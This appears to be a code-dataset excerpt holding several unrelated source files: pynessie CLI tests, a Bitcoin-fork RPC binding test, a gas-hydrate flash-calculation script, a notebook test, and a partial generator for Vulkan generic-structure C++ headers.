python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_nessie_cli.py
|
naren-dremio/nessie
|
fad41d58ba8d32a77b60cf4eed6fc62816a8ee28
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `pynessie` package."""
import itertools
import os
from pathlib import Path
from typing import List
from typing import Optional
import confuse
import pytest
import simplejson
from click.testing import CliRunner
from click.testing import Result
from pynessie import __version__
from pynessie import cli
from pynessie.model import Branch
from pynessie.model import ContentsSchema
from pynessie.model import EntrySchema
from pynessie.model import IcebergTable
from pynessie.model import ReferenceSchema
def _run(runner: CliRunner, args: List[str], input: Optional[str] = None, ret_val: int = 0) -> Result:
result = runner.invoke(cli.cli, args, input=input)
assert result.exit_code == ret_val
return result
@pytest.mark.vcr
def test_command_line_interface() -> None:
"""Test the CLI."""
runner = CliRunner()
result = _run(runner, list())
assert "Usage: cli" in result.output
help_result = _run(runner, ["--help"])
assert "Usage: cli" in help_result.output
help_result = _run(runner, ["--version"])
assert __version__ in help_result.output
help_result = _run(runner, ["--json", "branch", "-l"])
references = ReferenceSchema().loads(help_result.output, many=True)
assert len(references) == 1
assert references[0].name == "main"
assert isinstance(references[0], Branch)
assert references[0].hash_ == "2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d"
def test_config_options() -> None:
"""Ensure config cli option is consistent."""
runner = CliRunner()
result = _run(runner, ["config"])
assert "Usage: cli" in result.output
vars = ["--add x", "--get x", "--list", "--unset x"]
for i in itertools.permutations(vars, 2):
result = _run(runner, ["config"] + [*i[0].split(" "), *i[1].split(" ")], ret_val=2)
assert "Error: Illegal usage: " in result.output
_run(runner, ["config", "x", "--add", "x"])
def test_set_unset() -> None:
"""Test config set/unset/list."""
runner = CliRunner()
_run(runner, ["config", "--add", "test.data", "123", "--type", "int"])
result = _run(runner, ["config", "test.data", "--type", "int"])
assert result.output == "123\n"
_run(runner, ["config", "--unset", "test.data"])
result = _run(runner, ["config", "--list"])
assert "123" not in result.output
@pytest.mark.vcr
def test_remote() -> None:
"""Test setting and viewing remote."""
runner = CliRunner()
_run(runner, ["remote", "add", "http://test.url"])
_run(runner, ["remote", "add", "http://localhost:19120/api/v1"])
result = _run(runner, ["--json", "remote", "show"])
assert "main" in result.output
_run(runner, ["remote", "set-head", "dev"])
result = _run(runner, ["config", "default_branch"])
assert result.output == "dev\n"
_run(runner, ["remote", "set-head", "dev", "-d"])
result = _run(runner, ["config", "default_branch"], ret_val=1)
assert result.output == ""
assert isinstance(result.exception, confuse.exceptions.ConfigTypeError)
_run(runner, ["remote", "set-head", "main"])
@pytest.mark.vcr
def test_log() -> None:
"""Test log and log filtering."""
runner = CliRunner()
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 0
_run(
runner,
[
"contents",
"--set",
"foo.bar",
"--ref",
"main",
"-m",
"test_message",
"-c",
"2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d",
],
input=ContentsSchema().dumps(IcebergTable("/a/b/c")),
)
result = _run(runner, ["--json", "contents", "foo.bar"])
tables = ContentsSchema().loads(result.output, many=True)
assert len(tables) == 1
assert tables[0] == IcebergTable("/a/b/c")
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 1
result = _run(runner, ["--json", "log", logs[0]["hash"]])
logs = simplejson.loads(result.output)
assert len(logs) == 1
result = _run(runner, ["--json", "contents", "--list"])
entries = EntrySchema().loads(result.output, many=True)
assert len(entries) == 1
_run(runner, ["--json", "contents", "--delete", "foo.bar", "--ref", "main", "-m", "delete_message", "-c", logs[0]["hash"]])
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
assert len(logs) == 2
result = _run(runner, ["--json", "log", "{}..{}".format(logs[0]["hash"], logs[1]["hash"])])
logs = simplejson.loads(result.output)
assert len(logs) == 1
@pytest.mark.vcr
def test_ref() -> None:
"""Test create and assign refs."""
runner = CliRunner()
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
_run(runner, ["branch", "dev"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 2
_run(runner, ["branch", "etl", "main"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 3
_run(runner, ["branch", "-d", "etl"])
_run(runner, ["branch", "-d", "dev"])
result = _run(runner, ["--json", "branch"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
@pytest.mark.vcr
def test_tag() -> None:
"""Test create and assign refs."""
runner = CliRunner()
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 0
_run(runner, ["tag", "dev", "main"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 1
_run(runner, ["tag", "etl", "main"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 2
_run(runner, ["tag", "-d", "etl"])
_run(runner, ["tag", "-d", "dev"])
result = _run(runner, ["--json", "tag"])
references = ReferenceSchema().loads(result.output, many=True)
assert len(references) == 0
_run(runner, ["tag", "v1.0"], ret_val=1)
@pytest.mark.vcr
def test_assign() -> None:
"""Test assign operation."""
runner = CliRunner()
_run(runner, ["branch", "dev"])
_run(
runner,
[
"contents",
"--set",
"foo.bar",
"--ref",
"dev",
"-m",
"test_message",
"-c",
"2e1cfa82b035c26cbbbdae632cea070514eb8b773f616aaeaf668e2f0be8f10d",
],
input=ContentsSchema().dumps(IcebergTable("/a/b/c")),
)
_run(runner, ["branch", "main", "dev", "--force"])
result = _run(runner, ["--json", "branch"])
branches = ReferenceSchema().loads(result.output, many=True)
refs = {i.name: i.hash_ for i in branches}
assert refs["main"] == refs["dev"]
_run(runner, ["tag", "v1.0", "main"])
result = _run(runner, ["--json", "tag"])
tags = {i.name: i.hash_ for i in ReferenceSchema().loads(result.output, many=True)}
assert tags["v1.0"] == refs["main"]
_run(runner, ["tag", "v1.0", "dev", "--force"])
result = _run(runner, ["--json", "tag"])
tags = {i.name: i.hash_ for i in ReferenceSchema().loads(result.output, many=True)}
assert tags["v1.0"] == refs["dev"]
_run(runner, ["branch", "dev", "--delete"])
_run(runner, ["tag", "v1.0", "--delete"])
result = _run(runner, ["--json", "log"])
logs = simplejson.loads(result.output)
_run(runner, ["--json", "contents", "--delete", "foo.bar", "--ref", "main", "-m", "delete_message", "-c", logs[0]["hash"]])
@pytest.mark.doc
def test_all_help_options() -> None:
"""Write out all help options to std out."""
runner = CliRunner()
args = ["", "config", "branch", "tag", "remote", "log", "merge", "cherry-pick", "contents"]
for i in args:
result = _run(runner, [x for x in [i] if x] + ["--help"])
cwd = os.getcwd()
with open(Path(Path(cwd), "docs", "{}.rst".format(i if i else "main")), "w") as f:
f.write(".. code-block:: bash\n\n\t")
for line in result.output.split("\n"):
f.write(line + "\n\t")
f.write("\n\n")
| 36.683761
| 127
| 0.597274
|
178389d5858a94260cabec9a1b2e7e8ebbba8488
| 5,574
|
py
|
Python
|
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/rpcbind_test.py
|
mirzaei-ce/linux-shiabit
|
1c0e7371d1bb41e3efe20add0819d4e5050a3a0f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Test for -rpcbind, as well as -rpcallowip and -rpcconnect
# TODO extend this test from the test framework (like all other tests)
import tempfile
import traceback
from test_framework.util import *
from test_framework.netutil import *
def run_bind_test(tmpdir, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
nodes = start_nodes(1, tmpdir, [base_args + binds], connect_to)
try:
pid = shiabitd_processes[0].pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
finally:
stop_nodes(nodes)
wait_shiabitds()
def run_allowip_test(tmpdir, allow_ips, rpchost, rpcport):
'''
Start a node with rpcwallow IP, and request getinfo
at a non-localhost IP.
'''
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
nodes = start_nodes(1, tmpdir, [base_args])
try:
# connect to node through non-loopback interface
url = "http://rt:rt@%s:%d" % (rpchost, rpcport,)
node = get_rpc_proxy(url, 1)
node.getinfo()
finally:
node = None # make sure connection will be garbage collected and closed
stop_nodes(nodes)
wait_shiabitds()
def run_test(tmpdir):
assert(sys.platform == 'linux2') # due to OS-specific network stats queries, this test works only on Linux
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
assert(not 'This test requires at least one non-loopback IPv4 interface')
print("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
run_bind_test(tmpdir, None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
run_bind_test(tmpdir, ['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
run_bind_test(tmpdir, [non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
run_allowip_test(tmpdir, [non_loopback_ip], non_loopback_ip, defaultport)
try:
run_allowip_test(tmpdir, ['1.1.1.1'], non_loopback_ip, defaultport)
assert(not 'Connection not denied by rpcallowip as expected')
except ValueError:
pass
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave shiabitds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing shiabitd/shiabit-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
run_test(options.tmpdir)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
wait_shiabitds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| 37.662162
| 110
| 0.640653
|
0c38f70383286f3b0e6acc05acd2389d156cdf4d
| 3,286
|
py
|
Python
|
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
run_new.py
|
kdarnell/injection-sim-python
|
fa018de562989a207590c2628443b878bd0ed753
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import flashalgorithm as fc
import numpy as np
import pickle
import pdb
comp_list = ('water', 'methane', 'ethane', 'propane')
phase_list = ('aqueous', 'vapor', 'lhc', 's1', 's2')
P = 70 # bar
T = 273.15 + 6 # Kelvin
flash_full = fc.FlashController(components=comp_list,
phases=phase_list)
water_fracs = [0.4, 0.6, 0.92, 0.96]
hc_fracs = np.linspace(0, 1, 30)
c1_frac, c2_frac, c3_frac = np.meshgrid(hc_fracs, hc_fracs, hc_fracs)
z_all = list()
for water in water_fracs:
for hcs in zip(c1_frac.flatten(), c2_frac.flatten(), c3_frac.flatten()):
if sum(hcs) > 0.0:
mod_hcs = [x / sum(hcs) * (1.0 - water) for x in hcs]
z = np.asarray([water] + mod_hcs)
z_all.append(z / np.sum(z))
z_use = np.unique(np.asarray(z_all), axis=0)
def emptycomp_hash(z):
hashed = sum([2**ii for ii, x in enumerate(z) if x == 0.0])
return hashed
np.take(z_use,np.random.permutation(z_use.shape[0]),axis=0,out=z_use)
flash_dict = {0: flash_full}
all_output = list()
out_file = 'c1toc3_flashtable_70bar6C_pt_new1.pkl'
K_use = []
for ii, z in enumerate(z_use):
comp_hash = emptycomp_hash(z)
new_comps, new_z = zip(*[
(comp, z_) for comp, z_ in zip(comp_list, z)
if z_ != 0.0
])
if comp_hash not in flash_dict.keys():
flash_dict.update({comp_hash:
fc.FlashController(
components=new_comps,
phases=phase_list)})
flash_use = flash_dict[comp_hash]
new_z = np.asarray(new_z)
try:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=False)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=True)
except:
try:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=False)
if output[-1] > 1e-6:
output = flash_use.main_handler(
compobjs=flash_use.compobjs,
z=new_z,
T=T,
P=P,
initialize=True,
incipient_calc=True)
except:
output = []
all_output.append([ii, z, new_comps, new_z, output])
if np.mod(ii, 20) == 0:
#pdb.set_trace()
print('{0:3.3f} % complete!'.format(float(ii) * 100 / len(z_use)))
with open(out_file, 'wb') as f:
pickle.dump(all_output, f)
with open(out_file, 'wb') as f:
pickle.dump(all_output, f)
| 30.425926
| 76
| 0.506086
|
33f621e85f116a0cc71456be34809b20fbefd5d3
| 2,121
|
py
|
Python
|
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
ssrm_test/test_jupyter_notebooks.py
|
michaellindon/ssrm
|
c44f5382471a2c2ddea4bf597072304745af8578
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Optimizely Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
from typing import Any, Union
import papermill as pm
import pytest
JUPYTER_NOTEBOOK_DIR: Union[bytes, str] = os.path.join(os.getcwd(), "notebooks")
INCLUDED_NOTEBOOK_GLOB = os.path.join(JUPYTER_NOTEBOOK_DIR, "*.ipynb")
JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR: Union[bytes, str] = os.path.join(
os.getcwd(), "ssrm_test", "jupyter_notebook_testing_output"
)
@pytest.fixture
def generate_papermill_output_dir(tmpdir_factory: object) -> object:
"""Ensures directory exists for output notebooks. This is one of the
required parameters for papermill.execute_notebook()
"""
try:
os.makedirs(JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR, exist_ok=True)
yield JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR
# Teardown: delete testing output dir.
shutil.rmtree(JUPYTER_NOTEBOOK_TESTING_OUTPUT_DIR)
except OSError as err:
raise err
def test_all_jupyter_notebook(generate_papermill_output_dir, caplog):
caplog.set_level("INFO", logger="papermill")
for notebook_file_path in glob.glob(INCLUDED_NOTEBOOK_GLOB):
this_notebook_file_name: Union[Union[bytes, str], Any] = os.path.basename(
notebook_file_path
)
output_file_path = os.path.join(
generate_papermill_output_dir, this_notebook_file_name
)
pm.execute_notebook(
notebook_file_path,
output_file_path,
cwd=JUPYTER_NOTEBOOK_DIR,
log_output=True,
)
| 35.35
| 82
| 0.715229
|
1f3bd09f6c85450790f98bdaaade06cc9533d84c
| 27,174
|
py
|
Python
|
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
GenerateHeaders.py
|
Sixshaman/VulkanGenericStructures
|
1ca19402f33ec55acc5adfc57f42809337877bd9
|
[
"MIT"
] | null | null | null |
# MIT License
#
# Copyright (c) 2020 Sixshaman
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import urllib.request
import re
from bs4 import BeautifulSoup
header_license = """\
/********************************************************************************
MIT License
Copyright (c) 2020 Sixshaman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
********************************************************************************/
"""
header_start_h = """\
#ifndef VULKAN_GENERIC_STRUCTURES_H
#define VULKAN_GENERIC_STRUCTURES_H
#include <vulkan/vulkan.h>
#include <vector>
#include <unordered_map>
#include <cassert>
namespace vgs
{
using VulkanStructureType = VkStructureType;
template<typename VkStruct>
constexpr VulkanStructureType ValidStructureType = VK_STRUCTURE_TYPE_MAX_ENUM;
"""
header_start_hpp = """\
#ifndef VULKAN_GENERIC_STRUCTURES_HPP
#define VULKAN_GENERIC_STRUCTURES_HPP
#include <vulkan/vulkan.hpp>
#include <vector>
#include <unordered_map>
#include <cassert>
namespace vgs
{
using VulkanStructureType = vk::StructureType;
template<typename VkStruct>
constexpr VulkanStructureType ValidStructureType = VkStruct::structureType;
"""
header_stype_init_h = """\
inline void InitSType(void* ptr, ptrdiff_t offset, VulkanStructureType value)
{
memcpy((std::byte*)ptr + offset, &value, sizeof(VulkanStructureType));
}
"""
header_stype_init_hpp = """\
inline void InitSType(void* ptr, ptrdiff_t offset, VulkanStructureType value)
{
}
"""
header_end = """\
//==========================================================================================================================
//Base interface for StructureBlob(owning type-erased structure) and GenericStructureView(non-owning type-erased structure)
class GenericStructBase
{
protected:
GenericStructBase();
GenericStructBase(std::byte* data, size_t dataSize, ptrdiff_t pNextOffset, ptrdiff_t sTypeOffset);
~GenericStructBase();
public:
template<typename Struct>
Struct& GetDataAs();
std::byte* GetStructureData() const;
size_t GetStructureSize() const;
ptrdiff_t GetPNextOffset() const;
void* GetPNext() const;
ptrdiff_t GetSTypeOffset() const;
VulkanStructureType GetSType() const;
protected:
std::byte* StructureData;
size_t StructureSize;
ptrdiff_t PNextPointerOffset;
ptrdiff_t STypeOffset;
};
inline GenericStructBase::GenericStructBase(): StructureData(nullptr), StructureSize(0), PNextPointerOffset(0), STypeOffset(0)
{
}
inline GenericStructBase::GenericStructBase(std::byte* data, size_t dataSize, ptrdiff_t pNextOffset, ptrdiff_t sTypeOffset): StructureData(data), StructureSize(dataSize), PNextPointerOffset(pNextOffset), STypeOffset(sTypeOffset)
{
}
inline GenericStructBase::~GenericStructBase()
{
}
template<typename Struct>
inline Struct& GenericStructBase::GetDataAs()
{
assert(GetStructureSize() == sizeof(Struct));
assert(StructureData != nullptr);
Struct* structureData = reinterpret_cast<Struct*>(StructureData);
return *structureData;
}
inline std::byte* GenericStructBase::GetStructureData() const
{
assert(GetStructureSize() != 0);
return StructureData;
}
inline size_t GenericStructBase::GetStructureSize() const
{
return StructureSize;
}
inline ptrdiff_t GenericStructBase::GetPNextOffset() const
{
return PNextPointerOffset;
}
inline void* GenericStructBase::GetPNext() const
{
assert(PNextPointerOffset + sizeof(void*) <= GetStructureSize());
void* pNext = nullptr;
memcpy(&pNext, StructureData + PNextPointerOffset, sizeof(void*));
return pNext;
}
inline ptrdiff_t GenericStructBase::GetSTypeOffset() const
{
return STypeOffset;
}
inline VulkanStructureType GenericStructBase::GetSType() const
{
assert(STypeOffset + sizeof(VulkanStructureType) <= GetStructureSize());
VulkanStructureType sType;
memcpy(&sType, StructureData + STypeOffset, sizeof(VulkanStructureType));
return sType;
}
//==========================================================================================================================
//Non-owning version of a generic structure
class GenericStruct: public GenericStructBase
{
public:
template<typename Struct>
GenericStruct(Struct& structure);
//The copy constructor should be template-specialized, because <const GenericStructureView&> can be passed as a <Struct&>
template<>
GenericStruct(const GenericStruct& right);
GenericStruct& operator=(const GenericStruct& right);
};
template<typename Struct>
inline GenericStruct::GenericStruct(Struct& structure): GenericStructBase(reinterpret_cast<std::byte*>(&structure), sizeof(Struct), offsetof(Struct, pNext), offsetof(Struct, sType))
{
}
template<>
inline GenericStruct::GenericStruct(const GenericStruct& right): GenericStructBase(right.StructureData, right.StructureSize, right.PNextPointerOffset, right.STypeOffset)
{
}
inline GenericStruct& GenericStruct::operator=(const GenericStruct& right)
{
StructureData = right.StructureData;
StructureSize = right.StructureSize;
STypeOffset = right.STypeOffset;
PNextPointerOffset = right.PNextPointerOffset;
return *this;
}
//Creates a GenericStruct and automatically fills in sType (a side effect which is undesireable in constructors)
template<typename Struct>
inline GenericStruct TransmuteTypeToSType(Struct& structure)
{
InitSType(&structure, offsetof(Struct, sType), ValidStructureType<Struct>);
return GenericStruct(structure);
}
//==========================================================================================================================
//Owning version of a generic structure
class StructureBlob: public GenericStructBase
{
public:
StructureBlob();
StructureBlob(const StructureBlob& right);
StructureBlob& operator=(const StructureBlob& right);
template<typename Struct>
StructureBlob(const Struct& structure);
private:
std::vector<std::byte> StructureBlobData;
};
inline StructureBlob::StructureBlob()
{
PNextPointerOffset = 0;
STypeOffset = 0;
StructureData = nullptr;
StructureSize = 0;
}
template<typename Struct>
inline StructureBlob::StructureBlob(const Struct& structure)
{
static_assert(std::is_trivially_destructible<Struct>::value, "Structure blob contents must be trivially destructible");
PNextPointerOffset = offsetof(Struct, pNext);
STypeOffset = offsetof(Struct, sType);
StructureBlobData.resize(sizeof(Struct));
memcpy(StructureBlobData.data(), &structure, sizeof(Struct));
StructureData = StructureBlobData.data();
StructureSize = StructureBlobData.size();
//Init sType and set pNext to null
VulkanStructureType structureType = ValidStructureType<Struct>;
InitSType(StructureBlobData.data(), STypeOffset, structureType);
void* nullPNext = nullptr;
memcpy(StructureBlobData.data() + PNextPointerOffset, &nullPNext, sizeof(void*));
}
inline StructureBlob::StructureBlob(const StructureBlob& right)
{
*this = right;
}
inline StructureBlob& StructureBlob::operator=(const StructureBlob& right)
{
StructureBlobData.assign(right.StructureBlobData.begin(), right.StructureBlobData.end());
StructureData = StructureBlobData.data();
StructureSize = StructureBlobData.size();
STypeOffset = right.STypeOffset;
PNextPointerOffset = right.PNextPointerOffset;
assert(PNextPointerOffset + sizeof(void*) <= StructureBlobData.size());
//Zero out PNext
memset(StructureBlobData.data() + PNextPointerOffset, 0, sizeof(void*));
return *this;
}
//==========================================================================================================================
//Base class for a generic structure chain, hiding chain link type info
template<typename HeadType>
class GenericStructureChainBase
{
protected:
GenericStructureChainBase();
~GenericStructureChainBase();
public:
HeadType& GetChainHead();
template<typename Struct>
Struct& GetChainLinkDataAs();
public:
GenericStructureChainBase(const GenericStructureChainBase& rhs) = delete;
GenericStructureChainBase& operator=(const GenericStructureChainBase& rhs) = delete;
protected:
std::vector<std::byte*> StructureDataPointers;
std::vector<ptrdiff_t> PNextPointerOffsets;
std::vector<ptrdiff_t> STypeOffsets;
std::unordered_map<VulkanStructureType, size_t> StructureDataIndices;
};
template<typename HeadType>
inline GenericStructureChainBase<HeadType>::GenericStructureChainBase()
{
}
template<typename HeadType>
inline GenericStructureChainBase<HeadType>::~GenericStructureChainBase()
{
}
template<typename HeadType>
inline HeadType& GenericStructureChainBase<HeadType>::GetChainHead()
{
assert(StructureDataPointers.size() > 0);
assert(StructureDataPointers[0] != nullptr);
HeadType* head = reinterpret_cast<HeadType*>(StructureDataPointers[0]);
return *head;
}
template<typename HeadType>
template<typename Struct>
inline Struct& GenericStructureChainBase<HeadType>::GetChainLinkDataAs()
{
Struct* structPtr = reinterpret_cast<Struct*>(StructureDataPointers[StructureDataIndices.at(ValidStructureType<Struct>)]);
return *structPtr;
}
//==========================================================================================================================
//Generic structure chain, non-owning version
template<typename HeadType>
class GenericStructureChain: public GenericStructureChainBase<HeadType>
{
using GenericStructureChainBase<HeadType>::StructureDataPointers;
using GenericStructureChainBase<HeadType>::STypeOffsets;
using GenericStructureChainBase<HeadType>::PNextPointerOffsets;
using GenericStructureChainBase<HeadType>::StructureDataIndices;
public:
GenericStructureChain();
GenericStructureChain(HeadType& head);
~GenericStructureChain();
//Clears everything EXCEPT head
void Clear();
template<typename Struct>
void AppendToChain(Struct& next);
void AppendToChainGeneric(GenericStructBase& nextBlobData);
public:
GenericStructureChain(const GenericStructureChain& rhs) = delete;
GenericStructureChain& operator=(const GenericStructureChain& rhs) = delete;
private:
void AppendDataToChain(void* dataPtr, size_t sTypeOffset, size_t pNextOffset, VulkanStructureType sType);
protected:
HeadType HeadData;
};
template<typename HeadType>
inline GenericStructureChain<HeadType>::GenericStructureChain()
{
//Init HeadData's sType and pNext
InitSType(&HeadData, offsetof(HeadData, sType), ValidStructureType<HeadType>);
HeadData.pNext = nullptr;
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(&HeadData));
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline GenericStructureChain<HeadType>::GenericStructureChain(HeadType& head)
{
HeadData = head;
InitSType(&HeadData, offsetof(HeadData, sType), ValidStructureType<HeadType>);
HeadData.pNext = nullptr;
//Head is always the first pointer
StructureDataPointers.push_back(reinterpret_cast<std::byte*>(&HeadData));
STypeOffsets.push_back(offsetof(HeadType, sType));
PNextPointerOffsets.push_back(offsetof(HeadType, pNext));
StructureDataIndices[ValidStructureType<HeadType>] = 0;
}
template<typename HeadType>
inline GenericStructureChain<HeadType>::~GenericStructureChain()
{
}
template<typename HeadType>
inline void GenericStructureChain<HeadType>::Clear()
{
//Just reset the pointers
StructureDataPointers.clear();
PNextPointerOffsets.clear();
StructureDataIndices.clear();
